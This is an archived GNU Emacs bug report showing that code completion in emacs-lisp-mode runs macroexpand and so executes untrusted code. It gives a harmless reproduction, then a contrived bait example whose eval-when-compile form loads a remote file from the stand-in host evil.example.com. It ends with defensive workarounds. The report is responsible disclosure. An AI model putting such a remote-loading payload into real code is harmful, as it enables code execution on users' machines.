From mboxrd@z Thu Jan  1 00:00:00 1970
Path: news.gmane.org!.POSTED!not-for-mail
From: Wilfred Hughes <me@wilfred.me.uk>
Newsgroups: gmane.emacs.bugs
Subject: bug#32495: 26.1;
	Arbitrary code execution when completing inside untrusted elisp code
Date: Wed, 22 Aug 2018 01:11:55 +0100
Message-ID: <CAFXAjY7CEXsZfH_RNA8QjDYm7ynJtuCbBZOeSVATcA6rNw+qpQ@mail.gmail.com>
NNTP-Posting-Host: blaine.gmane.org
Mime-Version: 1.0
Content-Type: text/plain; charset="UTF-8"
X-Trace: blaine.gmane.org 1534896669 13850 195.159.176.226 (22 Aug 2018 00:11:09 GMT)
X-Complaints-To: usenet@blaine.gmane.org
NNTP-Posting-Date: Wed, 22 Aug 2018 00:11:09 +0000 (UTC)
To: 32495@debbugs.gnu.org
Original-X-From: bug-gnu-emacs-bounces+geb-bug-gnu-emacs=m.gmane.org@gnu.org Wed Aug 22 02:11:05 2018
Return-path: <bug-gnu-emacs-bounces+geb-bug-gnu-emacs=m.gmane.org@gnu.org>
Envelope-to: geb-bug-gnu-emacs@m.gmane.org
Original-Received: from lists.gnu.org ([208.118.235.17])
	by blaine.gmane.org with esmtp (Exim 4.84_2)
	(envelope-from <bug-gnu-emacs-bounces+geb-bug-gnu-emacs=m.gmane.org@gnu.org>)
	id 1fsGjn-0003RD-Du
	for geb-bug-gnu-emacs@m.gmane.org; Wed, 22 Aug 2018 02:11:03 +0200
Original-Received: from localhost ([::1]:56317 helo=lists.gnu.org)
	by lists.gnu.org with esmtp (Exim 4.71)
	(envelope-from <bug-gnu-emacs-bounces+geb-bug-gnu-emacs=m.gmane.org@gnu.org>)
	id 1fsGlt-000299-MD
	for geb-bug-gnu-emacs@m.gmane.org; Tue, 21 Aug 2018 20:13:13 -0400
Original-Received: from eggs.gnu.org ([2001:4830:134:3::10]:55106)
	by lists.gnu.org with esmtp (Exim 4.71)
	(envelope-from <Debian-debbugs@debbugs.gnu.org>) id 1fsGln-00028s-GX
	for bug-gnu-emacs@gnu.org; Tue, 21 Aug 2018 20:13:08 -0400
Original-Received: from Debian-exim by eggs.gnu.org with spam-scanned (Exim 4.71)
	(envelope-from <Debian-debbugs@debbugs.gnu.org>) id 1fsGlj-0001or-FF
	for bug-gnu-emacs@gnu.org; Tue, 21 Aug 2018 20:13:07 -0400
Original-Received: from debbugs.gnu.org ([208.118.235.43]:52125)
	by eggs.gnu.org with esmtps (TLS1.0:RSA_AES_128_CBC_SHA1:16)
	(Exim 4.71) (envelope-from <Debian-debbugs@debbugs.gnu.org>)
	id 1fsGli-0001nL-Ed
	for bug-gnu-emacs@gnu.org; Tue, 21 Aug 2018 20:13:02 -0400
Original-Received: from Debian-debbugs by debbugs.gnu.org with local (Exim 4.84_2)
	(envelope-from <Debian-debbugs@debbugs.gnu.org>) id 1fsGli-00034g-75
	for bug-gnu-emacs@gnu.org; Tue, 21 Aug 2018 20:13:02 -0400
X-Loop: help-debbugs@gnu.org
Resent-From: Wilfred Hughes <me@wilfred.me.uk>
Original-Sender: "Debbugs-submit" <debbugs-submit-bounces@debbugs.gnu.org>
Resent-CC: bug-gnu-emacs@gnu.org
Resent-Date: Wed, 22 Aug 2018 00:13:02 +0000
Resent-Message-ID: <handler.32495.B.153489675311777@debbugs.gnu.org>
Resent-Sender: help-debbugs@gnu.org
X-GNU-PR-Message: report 32495
X-GNU-PR-Package: emacs
X-GNU-PR-Keywords: 
X-Debbugs-Original-To: bug-gnu-emacs@gnu.org
Original-Received: via spool by submit@debbugs.gnu.org id=B.153489675311777
	(code B ref -1); Wed, 22 Aug 2018 00:13:02 +0000
Original-Received: (at submit) by debbugs.gnu.org; 22 Aug 2018 00:12:33 +0000
Original-Received: from localhost ([127.0.0.1]:57143 helo=debbugs.gnu.org)
	by debbugs.gnu.org with esmtp (Exim 4.84_2)
	(envelope-from <debbugs-submit-bounces@debbugs.gnu.org>)
	id 1fsGlE-00033s-MQ
	for submit@debbugs.gnu.org; Tue, 21 Aug 2018 20:12:32 -0400
Original-Received: from eggs.gnu.org ([208.118.235.92]:34000)
	by debbugs.gnu.org with esmtp (Exim 4.84_2)
	(envelope-from <me@wilfred.me.uk>) id 1fsGlD-00033h-Sc
	for submit@debbugs.gnu.org; Tue, 21 Aug 2018 20:12:32 -0400
Original-Received: from Debian-exim by eggs.gnu.org with spam-scanned (Exim 4.71)
	(envelope-from <me@wilfred.me.uk>) id 1fsGl6-0001ax-Oj
	for submit@debbugs.gnu.org; Tue, 21 Aug 2018 20:12:26 -0400
Original-Received: from lists.gnu.org ([2001:4830:134:3::11]:39583)
	by eggs.gnu.org with esmtps (TLS1.0:RSA_AES_256_CBC_SHA1:32)
	(Exim 4.71) (envelope-from <me@wilfred.me.uk>) id 1fsGl4-0001aU-UE
	for submit@debbugs.gnu.org; Tue, 21 Aug 2018 20:12:24 -0400
Original-Received: from eggs.gnu.org ([2001:4830:134:3::10]:54981)
	by lists.gnu.org with esmtp (Exim 4.71)
	(envelope-from <me@wilfred.me.uk>) id 1fsGl3-00026V-V4
	for bug-gnu-emacs@gnu.org; Tue, 21 Aug 2018 20:12:22 -0400
Original-Received: from Debian-exim by eggs.gnu.org with spam-scanned (Exim 4.71)
	(envelope-from <me@wilfred.me.uk>) id 1fsGkz-0001WR-Q5
	for bug-gnu-emacs@gnu.org; Tue, 21 Aug 2018 20:12:21 -0400
Original-Received: from mail-qk0-x233.google.com ([2607:f8b0:400d:c09::233]:39620)
	by eggs.gnu.org with esmtps (TLS1.0:RSA_AES_128_CBC_SHA1:16)
	(Exim 4.71) (envelope-from <me@wilfred.me.uk>) id 1fsGkz-0001Vh-Af
	for bug-gnu-emacs@gnu.org; Tue, 21 Aug 2018 20:12:17 -0400
Original-Received: by mail-qk0-x233.google.com with SMTP id b19-v6so115621qkc.6
	for <bug-gnu-emacs@gnu.org>; Tue, 21 Aug 2018 17:12:16 -0700 (PDT)
DKIM-Signature: v=1; a=rsa-sha256; c=relaxed/relaxed;
	d=wilfred-me-uk.20150623.gappssmtp.com; s=20150623;
	h=mime-version:from:date:message-id:subject:to;
	bh=wNhca8jq89xU+bpdWGm6jYsd1Q5bz9s7PMf7+sj6eHk=;
	b=svqvWuwphtIuSCfx9/r2uxLFzHXkIttUlpcOuW0nyQlTXUXgaobKzKZfkgKudvc7oV
	P2W8IVh7cXWtEJsLdkKfvzx6MSTbjWg3W8YgKbxRQn/voFjcLR7uDwgJtoj9sAmtmt6A
	W5u6NEWvPpeTDq55n+93wgApzjsH9T+VW0EuXpHrLucwzw76IXd0aI+DEt05bohX4F2J
	7/Vrlvse7cuwVuW5FNRHNl1a+BEoV0XvCbIxW8uZGA5zM9DVDIc1g4ZEGpIcjXkjXWz0
	/cPTgqT5RODSTfLZYUh/4FQsKklBL0PdMIHinAzIArnOCbtRr/nIdToPfVWmnXR2H1Oz
	mY0Q==
X-Google-DKIM-Signature: v=1; a=rsa-sha256; c=relaxed/relaxed;
	d=1e100.net; s=20161025;
	h=x-gm-message-state:mime-version:from:date:message-id:subject:to;
	bh=wNhca8jq89xU+bpdWGm6jYsd1Q5bz9s7PMf7+sj6eHk=;
	b=awQkDBnnkF1i0IbC7gMqcpqZ7dGCZB3Qt1/28UHrXs3h/nxmMsQHDb41bFTgCXDEgQ
	I1K+EdinWpJTqavwZ3IIzNgYQEPOXqueOkyI92sLxXSq7FmFfMOaW4259v5tfkxPt6WQ
	BEWLJFTqbOuoLXq4UPfS/+7gUnZS++bX9wWUbratUVgI3pIWqepyhCIzAnBnEr3EfZdo
	eBUmHHEk5HZz9qX2qAfk0Z+/PytnnyGDqOj1es7Bk1VcoBtI8v/+H5T81KNcD4252OpV
	pSuUsi8ifns2Okzbx7xoYg6pOYa6j3QZ/iJnBvszRAAUttzbWFRtnetZ6eW511S5HjFl
	c1NA==
X-Gm-Message-State: AOUpUlHPeAqbCf9lGWAhOgQmkzOJzpFZG6A4MxxSQz+urLQqKHusQij2
	Oe4TtsRlQgNgA1VapdYrh2wt4a5QFszZtEHIkyMchN0wIa0=
X-Google-Smtp-Source: AA+uWPwsBbdQuusbmfMdRCFJFbB/+dMneRYGG/E9yTyYeYnI+yxh+eqT0kQwkVnVJKjPZysbYlEKIFlhx2N/d3yRXVY=
X-Received: by 2002:a37:76c6:: with SMTP id
	r189-v6mr46370064qkc.282.1534896735980; 
	Tue, 21 Aug 2018 17:12:15 -0700 (PDT)
Original-Received: by 2002:aed:3305:0:0:0:0:0 with HTTP; Tue, 21 Aug 2018 17:11:55
	-0700 (PDT)
X-Originating-IP: [92.233.94.77]
X-detected-operating-system: by eggs.gnu.org: Genre and OS details not
	recognized.
X-detected-operating-system: by eggs.gnu.org: GNU/Linux 2.6.x
X-BeenThere: debbugs-submit@debbugs.gnu.org
X-Mailman-Version: 2.1.18
Precedence: list
X-detected-operating-system: by eggs.gnu.org: GNU/Linux 2.2.x-3.x [generic]
X-Received-From: 208.118.235.43
X-BeenThere: bug-gnu-emacs@gnu.org
List-Id: "Bug reports for GNU Emacs,
	the Swiss army knife of text editors" <bug-gnu-emacs.gnu.org>
List-Unsubscribe: <https://lists.gnu.org/mailman/options/bug-gnu-emacs>,
	<mailto:bug-gnu-emacs-request@gnu.org?subject=unsubscribe>
List-Archive: <http://lists.gnu.org/archive/html/bug-gnu-emacs/>
List-Post: <mailto:bug-gnu-emacs@gnu.org>
List-Help: <mailto:bug-gnu-emacs-request@gnu.org?subject=help>
List-Subscribe: <https://lists.gnu.org/mailman/listinfo/bug-gnu-emacs>,
	<mailto:bug-gnu-emacs-request@gnu.org?subject=subscribe>
Errors-To: bug-gnu-emacs-bounces+geb-bug-gnu-emacs=m.gmane.org@gnu.org
Original-Sender: "bug-gnu-emacs"
	<bug-gnu-emacs-bounces+geb-bug-gnu-emacs=m.gmane.org@gnu.org>
Xref: news.gmane.org gmane.emacs.bugs:149653
Archived-At: <http://permalink.gmane.org/gmane.emacs.bugs/149653>

elisp-completion-at-point calls macroexpand, which may execute arbitrary code.

REPRODUCING

1. Insert this code in a buffer in emacs-lisp-mode.

(let ((foo (eval-when-compile (debug))))
  x)

2. Put point on x.

3. Press C-M-i, or M-x elisp-completion-at-point.

4. Observe that the debugger is opened, because code is being executed!

SEVERITY

I don't know whether Emacs considers calling code-completion on
untrusted code to be a concern or not. A contrived example might look
like a bug report containing the following:

(let ((foo (eval-when-compile (eval "/ftp:evil.example.com:exploit.el")))
      ;; ... lots of code
      (bar 1))
  ;; Dear maintainer, I've found a bug in your completion. Please try
  ;; completion in the following:
  abc
  )

This could also cause accidental issues, as I might edit code that has
some unwanted side-effects inside eval-when-compile blocks. However,
this functionality has existed since 2013 (added in commit
bbcc4d97447a by Stefan) and no-one has noticed so far.

WORKAROUNDS

When calling macroexpand or macroexpand-all, either:

1. pass in an environment with all untrusted macros replaced with dummies:


(let ((macro-whitelist '(when pcase))
      all-macros
      safe-env)
  (mapatoms
   (lambda (sym)
     (when (macrop sym)
       (push sym all-macros))))
  (mapc
   (lambda (sym)
     (unless (memq sym macro-whitelist)
       (push (cons sym (symbol-function 'ignore))
             safe-env)))
   all-macros)

  (macroexpand-all
   arbitrary-form-here
   safe-env))

2. bind all eval-capable functions first (INCOMPLETE, there are other
eval-capable functions, such as load):

(cl-letf (((symbol-function 'eval) #'ignore)
          ((symbol-function 'eval-region) #'ignore)
          ((symbol-function 'eval-buffer) #'ignore)
          ((symbol-function 'backtrace-eval) #'ignore))
  (macroexpand-all some-arbitrary-form-here))